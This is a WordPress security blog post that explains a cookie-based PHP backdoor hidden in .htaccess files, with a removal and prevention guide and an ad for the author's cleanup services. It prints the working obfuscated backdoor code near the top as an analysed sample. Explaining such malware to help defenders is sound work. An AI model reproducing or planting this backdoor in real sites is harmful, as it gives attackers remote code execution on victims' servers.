Htaccess Malware: Cookie-Based PHP Backdoor Explained (With Removal Guide)

Published on 11/18/2025
MD Pabel
Read with ChatGPT

If your WordPress site is redirecting visitors, showing strange pop-ups, or getting flagged by Google, it may be infected with Htaccess Malware: Cookie-Based PHP Backdoor. This post explains what this malware is, how it works, how to remove it safely, and how to prevent reinfection. The language is simple so site owners can follow each step.

What is the Cookie-Based PHP Backdoor?

This is a malicious PHP backdoor stored inside a file named .htaccess or hidden in other files. A normal .htaccess file should never contain PHP code. Attackers place obfuscated PHP that builds and executes code from cookie values, giving them remote control over the site.

Example of the obfuscated code

<?php $c = $_COOKIE; $k = 0; $n = 5; $p = array(); $p[$k] = ''; while($n) { $p[$k] .= $c[36][$n]; if(!$c[36][$n+1]) { if(!$c[36][$n+2]) break; $k++; $p[$k] = ''; $n++; } $n = $n + 5 + 1; } $k = $p[0]() . $p[25]; if(!$p[18]($k)) { $n = $p[1]($k, $p[8]); $p[14]($n, $p[2] . $p[9]($p[7]($c[3]))); } include($k);

How this malware works (simple)

  • The attacker sends specially crafted cookies to the site.
  • The obfuscated PHP reads those cookie values and reconstructs a PHP script or command.
  • The reconstructed script is saved or executed on the server, creating a backdoor.
  • The attacker can then upload files, run commands, create admin users, or reinfect the site.

Where the malware usually hides

Attackers place fake or modified .htaccess files or hidden PHP files in folders that are commonly writable:

  • /wp-content/uploads/
  • /wp-content/plugins/
  • /wp-content/themes/
  • /wp-admin/
  • The site root (public_html/.htaccess) — if it contains PHP code, it’s suspicious

Common symptoms site owners see

  • Site redirects to unfamiliar pages (ads, scams, adult sites)
  • Google Search Console shows “site hacked” or security warnings
  • Antivirus tools block the domain
  • Slow site performance or unexplained CPU spikes
  • Unknown admin users in WordPress
  • New or hidden files appear in uploads or plugin folders

Step-by-step removal guide (safe method)

Follow these steps carefully. If you are not confident, hire a professional.

    • Backup everything firstExport a full site backup: files + database. Work on a copy if possible.
    • Inspect and restore the main .htaccessCheck /public_html/.htaccess. If it contains PHP code, delete it and replace with the default WordPress rules: 
      # BEGIN WordPress

RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]

# END WordPress
    • Find and remove fake .htaccess filesSearch inside /wp-content/uploads/, /wp-content/plugins/, and /wp-content/themes/. Delete any .htaccess that contains PHP, base64 strings, long obfuscated variables, or unknown code.
    • Scan and remove other malicious filesUse Wordfence, Sucuri, or your host’s malware scanner to identify suspicious PHP files. Manually review and remove files that you did not add.
    • Replace core WordPress filesDownload a fresh copy of WordPress and replace the /wp-admin/ and /wp-includes/ folders. Do not replace /wp-content/ unless you are sure.
    • Check uploads and themesInspect uploads for unexpected PHP files. Remove PHP files from uploads — uploads should contain images and media only.
    • Change all passwordsReset WordPress admin passwords, hosting control panel, FTP/SFTP, and database passwords. Remove unknown admin users.
    • Harden the siteDisable file editing in wp-config, enable two-factor authentication, and install a firewall plugin (for example, Wordfence or equivalent).

How to prevent reinfection

  • Keep WordPress, plugins, and themes updated.
  • Avoid nulled or pirated plugins and themes.
  • Use strong, unique passwords and 2FA for admin accounts.
  • Limit write permissions to only necessary folders and use correct file permissions.
  • Take regular backups and store them offsite.
  • Use a web application firewall (WAF) and security plugin.
  • Monitor logs and set alerts for new files in uploads and plugin folders.

When to call a professional

If the infection keeps returning after cleanup, if you cannot locate the entry point, or if your host suspended the site, hire an experienced malware removal specialist. This variant often hides additional backdoors that require thorough manual cleanup.

Final thoughts

Htaccess Cookie-Based PHP Backdoor is dangerous because it runs early and gives attackers remote code execution through crafted cookies. Cleaning it properly and fixing the root vulnerability is essential to stop reinfection. If you want, I can provide a downloadable clean .htaccess file and a follow-up checklist you can paste into your control panel.

If your website is infected with htaccess malware or a cookie-based PHP backdoor, I offer fast and guaranteed WordPress malware removal with 100% reinfection protection — contact me anytime for same-day cleanup.

Explore Our Security Services

WordPress Malware Removal

Professional WordPress malware removal to clean, secure & restore your hacked site fast — trusted by 2300+ clients.

Custom Website Development

Build a custom, responsive & SEO-optimized website or web app with modern tech — tailored to your business goals.

Fix WordPress Errors

Diagnose and fix WordPress site issues — fatal errors, performance problems, broken layouts, plugin conflicts and more.

About the Author

MD Pabel

MD Pabel

MD Pabel is the Founder and CEO of 3Zero Digital, a leading agency specializing in custom web development, WordPress security, and malware removal. With over 7+ Years years of experience, he has completed more than3200+ projects, served over 2300+ clients, and resolved4500+ cases of malware and hacked websites.

3Zero DigitalLinkedInGitHubLeetCodeHackerRankMediumDev.toX (Twitter)